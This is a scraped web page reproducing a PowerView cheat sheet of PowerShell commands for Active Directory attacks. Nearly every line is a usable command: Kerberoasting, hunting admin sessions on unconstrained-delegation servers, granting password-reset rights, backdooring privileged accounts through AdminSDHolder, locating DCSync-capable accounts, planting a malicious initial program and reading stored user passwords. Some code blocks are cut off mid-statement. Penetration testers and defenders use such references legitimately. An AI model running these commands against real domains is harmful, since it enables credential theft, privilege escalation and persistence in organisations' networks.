PowerView Cheat Sheet

Sharing is caring

Views: 89

Table of Contents



Get : retrieve full raw data sets

Find : ‘find’ specific data entries in a data set

Add : add a new object to a destination

Set : modify a given object

Invoke : lazy catch-all


Verb-Domain* : indicates that LDAP/.NET querying methods are being executed

Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration

Verb-Net* : indicates that Win32 API access is being used under the hood

Get-DomainGroup -MemberIdentity
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

$SecPassword = ConvertTo-SecureString ‘BurgerBurgerBurger!’ -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(‘TESTLAB\dfm.a’, $SecPassword)
Get-DomainUser -Credential $Cred

Get-DomainOU -GPLink ” | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}

$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter “(pwdlastset<=$Date)” -Properties samaccountname,pwdlastset

Get-DomainUser -LDAPFilter “(!userAccountControl:1.2.840.113556.1.4.803:=2)” -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname

Get-DomainUser -LDAPFilter “(userAccountControl:1.2.840.113556.1.4.803:=2)”

Get-DomainUser -LDAPFilter “(useraccountcontrol:1.2.840.113556.1.4.803:=262144)”

Get-DomainUser -LDAPFilter “(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)” -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname

‘S-1-5-21-890171859-3433809279-3366196753-1114’, ‘CN=dfm,CN=Users,DC=testlab,DC=local’,’4c435dd7-dc58-4b14-9a5e-1fdb0e80d201′,’administrator’ | Get-DomainUser -Properties samaccountname,lastlogoff

Get-DomainUser -SPN

Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH

Get-DomainUser -SPN | ?{$_.memberof -match ‘Domain Admins’}

Get-DomainUser -LDAPFilter ‘(sidHistory=*)’

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount

Get-NetLocalGroup SERVER.domain.local

return the local group members of a remote server using Win32 API methods (faster but less info)

Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local

Kerberoast any users in a particular OU with SPNs set

Invoke-Kerberoast -SearchBase “LDAP://OU=secret,DC=testlab,DC=local”

Find-DomainUserLocation == old Invoke-UserHunter

enumerate servers that allow unconstrained Kerberos delegation and show all users logged in

Find-DomainUserLocation -ComputerUnconstrained -ShowAll

hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation

Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

find all computers in a given OU

Get-DomainComputer -SearchBase “ldap://OU=…”

Get the logged on users for all machines in any server OU in a particular domain

Get-DomainOU -Identity server -Domain | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}}

enumerate all gobal catalogs in the forest


turn a list of computer short names to FQDNs, using a global catalog

gc computers.txt | % {Get-DomainComputer -SearchBase “GC://GLOBAL.CATALOG” -LDAP “(name=$_)” -Properties dnshostname}

enumerate the current domain controller policy

$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights # user privilege rights on the dc…

enumerate the current domain policy

$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # useful for golden tickets 😉
$DomainPolicy.SystemAccess # password age/etc.

enumerate what machines that a particular user/group identity has local admin rights to

Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation

Get-DomainGPOUserLocalGroupMapping -Identity

enumerate what machines that a given user in the specified domain has RDP access rights to

Get-DomainGPOUserLocalGroupMapping -Identity -Domain -LocalGroup RDP

export a csv of all GPO mappings

Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join “, “; $_} | Export-CSV -NoTypeInformation gpo_map.csv

use alternate credentials for searching for files on the domain

Find-InterestingDomainShareFile == old Invoke-FileFinder

$Password = “PASSWORD” | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential(“DOMAIN\user”,$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential

enumerate who has rights to the ‘matt’ user in ‘testlab.local’, resolving rights GUIDs to names

Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

grant user ‘will’ the rights to change ‘matt’s password

Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose

audit the permissions of AdminSDHolder, resolving GUIDs

Get-DomainObjectAcl -SearchBase ‘CN=AdminSDHolder,CN=System,DC=testlab,DC=local’ -ResolveGUIDs

backdoor the ACLs of all privileged accounts with the ‘matt’ account through AdminSDHolder abuse

Add-DomainObjectAcl -TargetIdentity ‘CN=AdminSDHolder,CN=System,DC=testlab,DC=local’ -PrincipalIdentity matt -Rights All

retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCsync)

Get-DomainObjectAcl “dc=dev,dc=testlab,dc=local” -ResolveGUIDs | ? {
($_.ObjectType -match ‘replication-get’) -or ($_.ActiveDirectoryRights -match ‘GenericAll’)

find linked DA accounts using name correlation

Get-DomainGroupMember ‘Domain Admins’ | %{Get-DomainUser $_.membername -LDAPFilter ‘(displayname=)’} | %{$a=$_.displayname.split(‘ ‘)[0..1] -join ‘ ‘; Get-DomainUser -LDAPFilter “(displayname=$a*)” -Properties displayname,samaccountname}

save a PowerView object to disk for later usage

Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml

Find any machine accounts in privileged groups

Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like ‘*$’}

Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights

Get-DomainObjectAcl -LDAPFilter ‘(objectCategory=groupPolicyContainer)’ | ? { ($_.SecurityIdentifier -match ‘^S-1-5-.*-[1-9]\d{3,}$’) -and ($_.ActiveDirectoryRights -match ‘WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner’)}

find all policies applied to a current machine

Get-DomainGPO -ComputerIdentity windows1.testlab.local

enumerate all groups in a domain that don’t have a global scope, returning just group names

Get-DomainGroup -GroupScope NotGlobal -Properties name

enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships

query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames

$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase “GC://testlab.local” -LDAPFilter ‘(objectclass=foreignSecurityPrincipal)’ | ? {$_.objectsid -match ‘^S-1-5-.*-[1-9]\d{2,}$’} | Select-Object -ExpandProperty distinguishedname
$Domains = @{}
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
# extract the domain the foreign user was added to
$ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf(‘DC=’)) -replace ‘DC=’,” -replace ‘,’,’.’
# check if we’ve already enumerated this domain
if (-not $Domains[$ForeignUserDomain]) {
$Domains[$ForeignUserDomain] = $True
# enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
$Filter = “(|(member=” + $($ForeignUsers -join “)(member=”) + “))”
Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
$ForeignMemberships | fl

if running in -sta mode, impersonate another credential a la “runas /netonly”

$SecPassword = ConvertTo-SecureString ‘Password123!’ -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(‘TESTLAB\dfm.a’, $SecPassword)
Invoke-UserImpersonation -Credential $Cred

… action


enumerates computers in the current domain with ‘outlier’ properties, i.e. properties not set from the firest result returned by Get-DomainComputer

Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier

set the specified property for the given user identity

Set-DomainObject testuser -Set @{‘mstsinitialprogram’=’\EVIL\program.exe’} -Verbose

Set the owner of ‘dfm’ in the current domain to ‘harmj0y’

Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y

retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCsync)

Get-ObjectACL “DC=testlab,DC=local” -ResolveGUIDs | ? {
($_.ActiveDirectoryRights -match ‘GenericAll’) -or ($_.ObjectAceType -match ‘Replication-Get’)

check if any user passwords are set

$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter ‘(userPassword=*)’ -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty ‘Password’ “$([System.Text.Encoding]::ASCII.GetString($_.userPassword))” -PassThru} | fl